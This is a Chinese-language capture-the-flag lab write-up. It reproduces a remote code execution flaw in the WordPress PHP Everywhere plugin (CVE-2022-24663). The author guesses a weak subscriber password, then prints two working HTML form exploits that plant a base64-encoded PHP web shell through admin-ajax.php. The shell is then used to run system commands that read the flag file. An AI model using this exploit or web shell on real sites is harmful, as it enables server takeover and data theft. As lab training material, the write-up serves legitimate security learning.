【春秋云境】 CVE-2022-24663复现

【春秋云境】 CVE-2022-24663复现

靶标介绍:

远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令

【春秋云境】 CVE-2022-24663复现

 打开地址进入场景

【春秋云境】 CVE-2022-24663复现

发现是个wp的后台。链接拼接上wp-admin 进入后台

爆破得到账号密码为test test 

【春秋云境】 CVE-2022-24663复现

【春秋云境】 CVE-2022-24663复现

提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码

这里指的是任意PHP代码并且是任意位置

随便找个html页面进行exp注入

 <form
      action="http://eci-2zei2lxiq05pi7hyrjxd.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
      method="post"
    >
      <input name="action" value="parse-media-shortcode" />
      <textarea name="shortcode">
[php_everywhere]file_put_contents("/var/www/html/fuck.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4="));[/php_everywhere]</textarea
      >
      <input type="submit" value="Execute" />
    </form>

【春秋云境】 CVE-2022-24663复现

【春秋云境】 CVE-2022-24663复现

 直接提交

【春秋云境】 CVE-2022-24663复现

直接访问http://eci-2zei2lxiq05pi7hyrjxd.cloudeci1.ichunqiu.com/fuck.php

返回状态码为200表示成功。其他表示不行

 <form
      action="http://eci-2zei2lxiq05pi7hyrjxd.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
      method="post"
    >
      <input name="action" value="parse-media-shortcode" />
      <textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/fuck.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea
      >
      <input type="submit" value="Execute" />
    </form>

可以尝试这段exp。参考大佬写法。加上了<?php ?>

【春秋云境】 CVE-2022-24663复现

 直接phpinfo();查看是否成功

【春秋云境】 CVE-2022-24663复现

cmd=system('tac /f*');

搞定 

【春秋云境】 CVE-2022-24663复现

                       

点击阅读全文

上一篇 2023年 6月 12日 am10:49
下一篇 2023年 6月 12日 am10:50